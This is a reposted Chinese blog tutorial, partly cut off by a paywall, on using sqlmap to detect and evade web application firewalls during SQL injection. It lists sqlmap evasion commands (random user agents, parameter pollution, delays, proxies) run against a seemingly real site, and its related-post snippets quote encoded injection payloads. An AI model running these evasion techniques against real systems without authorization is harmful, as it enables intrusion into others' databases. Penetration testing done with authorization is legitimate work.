mysql绕过防火墙_[转载]使用sqlmap 绕过防火墙进行注入测试

最新推荐文章于 2023-05-18 23:09:28 发布
最新推荐文章于 2023-05-18 23:09:28 发布
阅读量259 收藏 1
点赞数
文章标签: mysql绕过防火墙
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39633455/article/details/113983607
版权

0x00 前言

现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过,具体是否绕过,请仔细查看输出的信息。

0x01 确认WAF

首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我们可以利用这些来判断。在此我们,也介绍使用sqlmap 进行检测是否有WAF/IPS/IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10  --check-waf#备选

0x02 使用参数进行绕过

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy#禁止使用系统的代理,直接连接进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/co

最低0.47元/天 解锁文章
weixin_39633455
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
<小迪安全>19-SQL注入sqlmap绕过WAF
hackerXxxt的博客
03-17 831
1.白名单方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。测试方法:修改http的header来bypass wafx-Real-ip方式二:静态资源特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名后缀的请求。id=1id=1备注: Aspx/php只识别到前面的.aspx/.php后面基本不识别。
渗透测试必备神器SQLMAP的所有绕waf脚本合集
最新发布
10-18
在对抗Web应用防火墙(WAF)时,SQLMAP提供了一系列的绕过策略和脚本。WAF通常设置规则来阻挡已知的攻击模式,但SQL注入的灵活性使其能够避开这些静态防御。SQLMAP通过自动化的智能探测和多种技术,如盲注、时间延迟...
使用sqlmap 绕过防火墙进行注入测试
热门推荐
煜铭2011
04-20 4万+
0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕...
测试mysql能否通过防火墙_使用sqlmap 绕过防火墙进行注入测试
weixin_29105429的博客
01-21 211
0x00 前言现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过,具体是否绕过...
那些年我们绕过的WAF
05-07
描述中提到,本文总结了WAF绕过的方法,旨在帮助测试人员在进行安全性测试时,能够有效地绕过WAF的限制。 以下是一些具体的绕过WAF的策略和技术: 1. **编码转换**: - **URL编码**:攻击者可以使用URL编码来隐藏...
sqlmap中文手册-sql注入自动化测试工具
07-19
此外,SQLMap还具备绕过WAF(Web应用防火墙)的能力,提高了在复杂环境下的成功率。 在保持工具最新性方面,用户可以通过官方GitHub仓库获取最新版本,了解更新日志,确保使用的始终是最先进的工具。同时,社区的...
SqlMap注入软件
03-29
6. **多重防护绕过**:SqlMap内置了多种策略来绕过常见的WAF(Web应用防火墙)和其他防护机制,使得测试更加隐蔽和有效。 7. **自定义脚本**:对于复杂的测试场景,用户可以通过编写自定义脚本扩展SqlMap的功能,以...
第06篇:Bypass D盾_IIS防火墙SQL注入防御(多姿势)1
08-03
思路:a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql,可花费不少时间,测试
SQLmap简介以及防火墙绕过方法
weixin_30526593的博客
01-23 489
简介 许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全攻击问题也被划归在了对于用户输...
sqlmap.py mysql注入_sqlmap注入之tamper绕过WAF防火墙过滤(转载
weixin_32247165的博客
01-26 181
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。所以有的时候我们会发现,注入成功了...
实战sqlmap绕过WAF
zkaqlaoniao的博客
10-26 3929
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxx..
第19天-WEB漏洞-SQL注入SQLMAP绕过WAF
MCTSOG的博客
03-03 1876
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
mysql查看防火墙状态命令_Linux设置允许指定端口通过防火墙centos7
weixin_39741101的博客
01-28 402
开启防火墙1.systemctl start firewalld.service(开启防火墙)2.systemctl stopfirewalld.service(关闭防火墙)3.service firewalld restart(从启防火墙)4.firewall-cmd --zone=public --add-port=4400-4600/udp --permanen(指定端口范围为4400-4...
第18、19天:WEB漏洞-WAF绕过注入以及SQLMAP绕过WAF
cailme的博客
05-18 1617
渗透测试day18、19天
sqlmap tamper mysql_SQLMAP自带的绕过脚本 --tamper详解
weixin_36161279的博客
01-19 104
大家好我是哥哥不爱吃米饭 喜欢的可以关注我一下首先这个文章我是转来的http://www.chuhades.com/post/19590b_4cc51f确实很实用,就当记录一下吧,方便日后查询。(1) apostrophemask.py UTF-8编码Example:* Input: AND '1'='1'* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%E...
SQLMAP使用教程(四)实战技巧三之绕过防火墙
不秃头的程序Yang
07-06 822
一、查看temper模块 四、设置http请求延时 五、使用代理注入
第19篇:WEB漏洞~SQL注入~SqlMap绕过WAF
廖一语山的博客
08-06 1797
Sqlmap
sqlmap绕过防火墙
08-29
如果你想在使用SQLMap绕过防火墙,我强烈建议你停止这样的行为。绕过防火墙可能违反法律法规,并且可能会对目标网络和系统造成不可预测的风险。更重要的是,合法的渗透测试应该在合规和授权的情况下进行。 如果你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值